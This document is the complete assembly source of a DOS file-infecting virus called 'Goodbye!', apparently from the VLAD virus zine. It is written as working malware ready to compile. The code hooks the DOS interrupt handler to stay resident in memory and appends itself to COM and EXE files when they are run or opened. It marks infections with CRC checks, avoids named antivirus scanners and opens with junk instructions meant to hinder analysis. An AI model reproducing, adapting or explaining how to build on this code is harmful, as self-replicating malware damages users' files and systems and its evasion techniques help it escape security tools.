; Goodbye!
; by Qark/VLAD
;
; This virus is to say goodbye to all my friends in the virus scene.
;
;
; Infects EXE's and COM's, using CRC32 on any data comparisons.
;
; Ideas stolen from Zhengxi - but not the code!
;
; Compile with a86 as ever.
;
org 0
;Below is stupid stuff
sub ax,ax
mov cx,ax
dec ax
sub ch,al
mov dx,cx
rol cx,1
mov dl,al
div cx
div cx
div cx
div cx
div cx
dec cx
add dx,ax
div cx
div cx
div cx
xchg dx,ax
mov si,100h
org $-2
delta dw 100h
mov ax,51bdh
int 21h
cmp ax,0bd51h
je notvirus
mov ax,ds
add ax,dx
mov ds,ax
xor di,di
cmp byte ptr [di],'Z'
jne notvirus
sub word ptr [di+3],(offset vmemsize /16)+2
sub word ptr [di+12h],(offset vmemsize/16)+2
;Because so many people complained i've fixed my MCB code :)
;UMB's now survive..
mov byte ptr [di],'M'
add ax,word ptr [di+3]
inc ax
mov ds,ax
mov byte ptr ds:[di],'Z'
mov word ptr ds:[di+1],8
mov word ptr ds:[di+3],(offset vmemsize/16)+1
inc ax
push es
pop ds
mov es,ax ;ax=es=virus segment
cld
push si
mov cx,offset vpsize
db 2eh ;cs:
rep movsb
push ds
mov ds,cx ;ds=0
mov es,ax
mov si,21h*4
mov di,offset i21
movsw
movsw
mov word ptr [si-4],offset virushandler
mov word ptr [si-2],ax
pop ds
push ds
pop es
pop si
notvirus:
push cs
pop ds
cmp si,16
jb exefile
mov di,101h
mov ax,word ptr [si+orig5]
mov word ptr [di-1],ax
mov ax,word ptr [si+orig5+2]
mov word ptr [di+1],ax
mov al,byte ptr [si+orig5+4]
mov byte ptr [di+3],al
dec di
xor ax,ax
jmp di
db "Goodbye everyone!",0dh,0ah
db "Viruses were fun, but I've got other things I'd like to do",0dh,0ah
db "Qark/VLAD",0dh,0ah
exefile:
mov ax,es
add ax,10h
add word ptr cs:[si+offset exejump+2],ax
jmp $+2
push es
pop ds
add ax,0
org $-2
origss dw 0
mov ss,ax
mov sp,0
org $-2
origsp dw 0
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,si
db 0eah
exejump dd 0
virushandler:
xchg ah,al
cmp ax,0bd51h
jne notres
iret
notres:
cmp al,4bh
je infect
cmp al,3dh
je infect
cmp al,43h
je infect
out21:
xchg ah,al
db 0eah
i21 dd 0
infect:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
cld
cmp ah,6ch
je no6cchange
mov si,dx
no6cchange:
push cs
pop es
mov di,offset filename
mov ah,60h
call int21h
jnc goodname
badname1:
jmp badname
goodname:
push cs
pop ds
call check_name
jc badname1
mov dx,offset filename
mov ax,3d02h
call int21h
jc badname1
xchg bx,ax
mov ah,3fh
mov cx,18h
mov dx,offset header
call int21h
mov si,offset header
mov cx,2
call crc16
cmp ax,6bb5h ;MZ
je infexe
cmp ax,95fah ;ZM
je infexe
infcom:
mov si,offset header
mov cx,5
call crc16
or ax,ax
jz badclose ;Infected!
call lseekend
or dx,dx
jnz badclose
cmp ax,64000
ja badclose
cmp ax,1001
jb badclose
push ax
sub ax,3
mov word ptr combyte+1,ax
pop ax
add ax,100h
mov word ptr delta,ax
mov ah,40h
mov cx,offset vpsize
xor dx,dx
call int21h
jc badclose
call lseek0
;to mark infection, crc check the e9,xx,xx and put the crc
;after it, before writing to file.
mov si,offset combyte
mov cx,3
call crc16
mov word ptr combyte+3,ax
mov ah,40h
mov cx,5
mov dx,offset combyte
call int21h
badclose:
mov ah,3eh
call int21h
jmp badname
infexe:
mov si,offset header
mov cx,14h
call crc16
or ax,ax
jz badclose ;already infected
cmp word ptr [si+18h],40h
je badclose
cmp word ptr [si+0ch],-1
jne badclose
mov ax,word ptr [si+0eh]
mov word ptr origss,ax
mov ax,word ptr [si+10h]
mov word ptr origsp,ax
mov ax,word ptr [si+14h]
mov word ptr exejump,ax
mov ax,word ptr [si+16h]
mov word ptr exejump+2,ax
call lseekend
mov cx,16
div cx
sub ax,word ptr [si+8]
mov word ptr [si+14h],dx
mov word ptr [si+16h],ax
mov word ptr delta,dx
add dx,offset vmemsize
and dx,0fffeh
inc ax
mov word ptr [si+0eh],ax
mov word ptr [si+10h],dx
mov ah,40h
mov cx,offset vpsize
xor dx,dx
call int21h
jc badclose
call lseekend
mov cx,512
div cx
or dx,dx
jz nopagefix
inc ax
nopagefix:
mov word ptr [si+4],ax
mov word ptr [si+2],dx
mov cx,12h
call crc16
mov word ptr [si+12h],ax
call lseek0
mov ah,40h
mov cx,1ch
mov dx,si
call int21h
jmp badclose
badname:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp out21
;;;;---------->
lseekend:
mov ax,4202h
jmp lseek
lseek0:
mov ax,4200h
lseek:
xor cx,cx
cwd
call int21h
ret
;;;;---------->
check_name:
mov si,offset filename
cmp byte ptr [si+2],'/' ;"CON" etc gives a reverse slash.
je fail_name ;Will mess up my backslash checking
;if a program tries to open one.
findstrend:
lodsb
cmp al,0
jne findstrend
dec si
mov word ptr zpointer,si
std
findslend:
lodsb
cmp al,'\'
jne findslend
cld
lodsw
mov word ptr fpointer,si
;si points to file name name.ext hopefully
mov cx,word ptr zpointer
sub cx,si
call crc16
;ax = crc value
cmp ax,0bd8h ;tbscan.exe
je fail_name
cmp ax,0f07fh ;avp.exe
je fail_name
cmp ax,5e88h ;f-prot.exe
je fail_name
cmp ax,3cb2h ;scan.exe
je fail_name
cmp ax,86a5h ;dv.exe
je fail_name
cmp ax,0ba8eh ;progman.exe
je fail_name
mov si,word ptr zpointer
cmp byte ptr [si-4],'.'
jne fail_name
sub si,3
mov cx,3
call crc16
cmp ax,0e6ebh ;exe
je pass_name
cmp ax,0d105h ;com
je pass_name
jmp fail_name
pass_name:
clc
ret
fail_name:
stc
ret
;;;;---------->
crc16 proc near
;on entry cx=number of bytes to checksum
; si=pointer to bytes
;on exit ax contains the checksum
;I stole this code from some PD sources I got off a BBS.
push bx
push cx
push si
push di
call gentable
xor ax,ax
crc16loop:
xor bh,bh
mov bl,al
lodsb
xor bl,al
shl bx,1
mov bx,word ptr [bx+crc16tab]
xor bl,ah
mov ax,bx
loop crc16loop
pop di
pop si
pop cx
pop bx
ret
crc16 endp
;;;;---------->
Gentable proc near
;Generates the 16bit crc table.
push ax
push cx
push dx
push di
mov di,offset crc16tab
xor cx,cx
outgen:
xor ax,ax
mov al,cl
push cx
mov cx,8
calcloop:
clc
rcr ax,1
jnc nocrcxor
xor ax,0a001h
nocrcxor:
loop calcloop
mov word ptr [di],ax
inc di
inc di
pop cx
inc cx
cmp cx,100h
jne outgen
pop di
pop dx
pop cx
pop ax
ret
Gentable endp
;;;;---------->
int21h:
pushf
call dword ptr cs:i21
ret
;;;;---------->
combyte db 0e9h,0,0,0,0
header:
orig5 db 0cdh,20h,0,0,0
vpsize:
db 18h - 5 dup (0)
zpointer dw 0 ;the offset of the end of the filename
fpointer dw 0 ;the offset of the start of the filename
filename db 128 dup (0)
crc16tab db 100h*2 dup (0)
vmemsize:
- VLAD #7 INDEX -